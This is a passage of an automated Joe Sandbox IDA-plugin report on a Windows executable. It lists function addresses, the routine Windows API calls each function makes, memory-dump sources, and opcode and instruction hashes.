                          • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF71612274D), ref: 00007FF7161228A9
                          • GetLastError.KERNEL32(?,00007FF71612274D), ref: 00007FF7161228B8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                          • Instruction ID: 6c6fb8b9031ac938f3a482ab6b838fe0c1422cc183399a2a495acf62f3c3d318
                          • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                          • Instruction Fuzzy Hash: 2731C622B19D52C1FA606F2AFD406FEA391AF04BF4FA48135DE1D47790DE2CD589B260
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Item_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1746051919-0
                          • Opcode ID: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                          • Instruction ID: 898019f648a9cee868f1415b99107d1db51ea4fa8b85bc58a48e8300812fd73f
                          • Opcode Fuzzy Hash: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                          • Instruction Fuzzy Hash: B131C5A1A28B4541FA10EB25F8453BBF361EB857A0F804231EB9C07B95DF3CE1899710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: File$BuffersFlushTime
                          • String ID:
                          • API String ID: 1392018926-0
                          • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                          • Instruction ID: 3e0863ffe9bc20413a21ac8593f67cd1e8ece317155b85366d9053a9161ffb56
                          • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                          • Instruction Fuzzy Hash: 4C21D122E09F42D1FA62AE11FC003FBD692AF067A4FA5C135DE4C02295EE3CD58ED210
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: LoadString
                          • String ID:
                          • API String ID: 2948472770-0
                          • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                          • Instruction ID: 0c1d5eabcc31d94f094ffdcdaeb310ad0129a2a35dcca3a9020e752dfd8b8141
                          • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                          • Instruction Fuzzy Hash: DD114F65B09B4185FA40AF16BC4016AF7A1BB94FE0BA44439CE0D93720DF7CE949D354
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                          • Instruction ID: 127615f406c22b9ee226ecd8d692ce32e60635c2ba7a443f239dbbfa481f53e4
                          • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                          • Instruction Fuzzy Hash: CF119321A08A41C1FB50AB25FC412AEA261FB55BB4FE48335DA6D522D4CF3CD99AD310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Item$RectText$ClientWindowswprintf
                          • String ID:
                          • API String ID: 402765569-0
                          • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                          • Instruction ID: b43fca41c0da4c6f3861c49b5f1e796b3b41f82bf7d897c33808aa39f48e3de8
                          • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                          • Instruction Fuzzy Hash: EC011290A09B4A42FF997761BCA82FBD7915F85764F884035DC4D0629DDE2CE8CDE320
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF71612EBAD,?,?,?,?,00007FF716125752,?,?,?,00007FF7161256DE), ref: 00007FF71612EB5C
                          • GetProcessAffinityMask.KERNEL32 ref: 00007FF71612EB6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Process$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1231390398-0
                          • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                          • Instruction ID: 9710e6540939c035a9bc02006de56cf2104f59c8062d4d64f6ccb5c7f553e77b
                          • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                          • Instruction Fuzzy Hash: 20E02B61F14E4686EF489F69D8404EBF3A2BFC8B50FC48036E60B83618DE2CE14D8B00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                          • String ID:
                          • API String ID: 1173176844-0
                          • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                          • Instruction ID: d124460659e5848dc2d4d068548187fb22fbbf1591babc65b2420cb9ac4b4e91
                          • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                          • Instruction Fuzzy Hash: 7CE0B660E1A90741F95832723C265F680600F69770ED89730DE3E062C6BF1DA5DEA130
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorLanguagesLastPreferredRestoreThread
                          • String ID:
                          • API String ID: 588628887-0
                          • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                          • Instruction ID: 03c6d38c99e0c6203de44961c6d69e54bb91e03a7ae3863e7cccacacc7464cce
                          • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                          • Instruction Fuzzy Hash: 52E04F61E0990382FF047BB2BC151B692A19F94770BC44030C90D87252EF2C948DA620
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
                          • Instruction ID: 613ee2279881651fc57609860afe9e4e8b310af5297eb11df5458f51eb610e67
                          • Opcode Fuzzy Hash: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
                          • Instruction Fuzzy Hash: 0AD1CEB2B08EC556FB549B35AD402BAE7A1FB05BA4F840035CB5D477A9CF38E568E310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CompareString_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1017591355-0
                          • Opcode ID: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                          • Instruction ID: 5a291b81c4dd9bf32a7e2bbf3ab1934714ed103450c140cec63f31b76e7f6097
                          • Opcode Fuzzy Hash: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                          • Instruction Fuzzy Hash: 2F61C211A0CE87C1FA64BB257C9517BD292AF41BF0FA45139DE4F06AC5FE6CE448A220
                          APIs
                            • Part of subcall function 00007FF71612E948: ReleaseSemaphore.KERNEL32 ref: 00007FF71612E974
                            • Part of subcall function 00007FF71612E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF71612E993
                            • Part of subcall function 00007FF71612E948: DeleteCriticalSection.KERNEL32 ref: 00007FF71612E9AA
                            • Part of subcall function 00007FF71612E948: CloseHandle.KERNEL32 ref: 00007FF71612E9B7
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716131ACB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1624603282-0
                          • Opcode ID: bf490f98653311f0fa717d6a61b3b21447a9b3ceefdab9f981681a0b66a97f5a
                          • Instruction ID: 7d84b6494530b34b1c03fa9eaea02558089406151df2f16ac5f00d35afe15b17
                          • Opcode Fuzzy Hash: bf490f98653311f0fa717d6a61b3b21447a9b3ceefdab9f981681a0b66a97f5a
                          • Instruction Fuzzy Hash: 5861C172B16E8591FE08EB65E9450BEB365FF40BB1B944132D72E07AD1DF2CE4A89310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 607368e413bc42d48fc483c0537fc0e05792b1f83dee924582f930783f75b2fb
                          • Instruction ID: f0ce14d2a51924bc95f6e9ffcc118aa4ae7ca4ae0b013b456e6346c1fda539fa
                          • Opcode Fuzzy Hash: 607368e413bc42d48fc483c0537fc0e05792b1f83dee924582f930783f75b2fb
                          • Instruction Fuzzy Hash: 7151C7A2A08E4280FE14AB76F8443ABA751FB45BE4F940135DE4D07392DF3DE589D320
                          APIs
                            • Part of subcall function 00007FF716123EC8: FindClose.KERNELBASE(?,?,00000000,00007FF716130811), ref: 00007FF716123EFD
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611E993
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1011579015-0
                          • Opcode ID: b25a0dcdf97d563b9153ddc70198164d8453106f1b1cd9031932cf08272d4a92
                          • Instruction ID: 867c03485ebc440950b11f0a9ed20278fdadb8f5e55cd5cd94b17126f2489bde
                          • Opcode Fuzzy Hash: b25a0dcdf97d563b9153ddc70198164d8453106f1b1cd9031932cf08272d4a92
                          • Instruction Fuzzy Hash: 6E5186A2A18E8582FB50EF65F84537EA351FF84BA4F840135EA4D076A5DF2CD445E720
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
